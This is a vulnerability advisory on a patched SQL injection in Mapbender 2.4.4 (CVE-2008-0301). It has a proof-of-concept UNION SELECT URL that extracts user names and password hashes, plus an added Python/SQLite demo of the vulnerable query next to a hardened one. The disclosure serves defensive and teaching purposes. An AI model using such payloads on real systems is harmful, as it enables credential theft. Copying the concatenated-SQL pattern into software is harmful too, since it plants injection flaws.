Credit:
The information has been provided by RedTeam Pentesting GmbH.
The original article can be found at: http://www.redteam-pentesting.de/advisories/rt-sa-2008-002.php
Vulnerable Systems:
* Mapbender version 2.4.4
Immune Systems:
* Mapbender version 2.4.5 rc1
The SQL injection vulnerabilities in Mapbender 2.4.4 can be exploited regardless of whether PHP's magic_quotes_gpc is enabled. For demonstration purposes, the injection into the "gaz" request parameter of the file http/php/mod_gazetteer_edit.php is shown.
The two relevant lines are:
$sql = "SELECT * FROM gazetteer WHERE gazetteer_id = ".$_REQUEST["gaz"];
$res = db_query($sql);
The value of $_REQUEST["gaz"] (which may come from GET, POST or cookie data) is concatenated into the SQL statement without any validation, quoting or escaping, and no prepared statement is used. The attacker therefore controls the remainder of the query and can execute arbitrary SQL.
Because the injection point is a numeric comparison, the payload does not need a single quote character. PHP magic quotes only escape quotes, backslashes and NUL bytes, so they offer no protection here.
Proof of Concept:
The following request retrieves the first username and password hash from the Mapbender database. It is a single request, wrapped here for readability; in practice the spaces are URL-encoded. The payload uses MySQL syntax ("char()", "LIMIT 0,1"): "LIMIT 0" suppresses the legitimate gazetteer row, the UNION SELECT must return as many columns as the gazetteer table (ten here), and char(65) ("A") pads the columns the attacker does not care about, so the username and hash appear in the seventh and ninth columns of the result.
http://www.example.com/php/mod_gazetteer_edit.php?gaz=1 LIMIT 0 UNION
(SELECT char(65), char(65), char(65), char(65), char(65), char(65),
mb_user_name, char(65), mb_user_password, char(65) from mb_user
LIMIT 0,1)
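To make the mechanics above reproducible offline, here is an added example (not Mapbender code and not part of the original advisory) that rebuilds the vulnerable PHP line and a hardened replacement in Python with an in-memory SQLite database. The table layouts, row contents and the md5 hash are constructed stand-ins; the gazetteer table is given ten columns because the advisory's payload pads to ten. The payload is the advisory's UNION attack rewritten for SQLite, which does not accept MySQL's "LIMIT 0 UNION (...)" form: "AND 0" plays the role of "LIMIT 0" in discarding the legitimate row.

```python
"""Model of the mod_gazetteer_edit.php injection, rebuilt with Python and sqlite3.

Constructed example: table layouts, rows and hash values are invented
stand-ins, not data from any real Mapbender installation.
"""
import re
import sqlite3


def build_db():
    """Create an in-memory database with a ten-column gazetteer and a user table."""
    db = sqlite3.connect(":memory:")
    # Assumed layout: ten columns, matching the ten-column UNION in the advisory.
    # Column names other than gazetteer_id are invented.
    db.execute(
        "CREATE TABLE gazetteer (gazetteer_id INTEGER, c2, c3, c4, c5, c6, c7, c8, c9, c10)"
    )
    db.execute("INSERT INTO gazetteer VALUES (1, 'a','b','c','d','e','f','g','h','i')")
    db.execute("CREATE TABLE mb_user (mb_user_name TEXT, mb_user_password TEXT)")
    # Constructed row; the hash is md5('password').
    db.execute("INSERT INTO mb_user VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99')")
    return db


def lookup_vulnerable(db, gaz):
    """Mirror of the PHP: $sql = "SELECT * FROM gazetteer WHERE gazetteer_id = ".$_REQUEST["gaz"];"""
    sql = "SELECT * FROM gazetteer WHERE gazetteer_id = " + gaz
    return db.execute(sql).fetchall()


def lookup_fixed(db, gaz):
    """Hardened variant: validate the input as an integer, then bind it as a parameter.

    Either measure alone would stop this payload; using both means a future
    change to one of them does not silently reopen the hole.
    """
    if not re.fullmatch(r"[0-9]+", gaz):
        raise ValueError("gaz must be a non-negative integer")
    return db.execute(
        "SELECT * FROM gazetteer WHERE gazetteer_id = ?", (int(gaz),)
    ).fetchall()


# The advisory's payload adapted to SQLite: no quotes are needed because the
# injection point is numeric. "AND 0" discards the real gazetteer row, the
# UNION SELECT supplies exactly ten columns, and char(65) ('A') fills the
# columns the attacker does not need.
PAYLOAD = (
    "1 AND 0 UNION SELECT char(65), char(65), char(65), char(65), char(65), char(65), "
    "mb_user_name, char(65), mb_user_password, char(65) FROM mb_user LIMIT 1"
)


def demo():
    """Return (rows leaked by the vulnerable query, whether the fixed query rejected the payload)."""
    db = build_db()
    leaked = lookup_vulnerable(db, PAYLOAD)
    try:
        lookup_fixed(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    rows, blocked = demo()
    for row in rows:
        # Username lands in column 7, hash in column 9, as in the advisory's layout.
        print("leaked:", row[6], row[8])
    print("fixed query rejected payload:", blocked)
```

Running the block prints the constructed admin username and hash from the vulnerable path and confirms the hardened path rejects the payload; a legitimate value such as "1" still returns the gazetteer row through both functions.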
Fix:
The vulnerability is fixed in release 2.4.5 rc1.
Security Risk:
As an attacker is able to, for example, obtain the password hashes of administrators and other users, the risk is rated high.
CVE Information:
CVE-2008-0301
Disclosure Timeline:
2007-12-14 Problem identified during a penetration test
2008-01-09 Customer approves contacting of Mapbender developers
2008-01-17 CVE number assigned
2008-03-10 Vendor releases fixed version
2008-03-11 Advisory released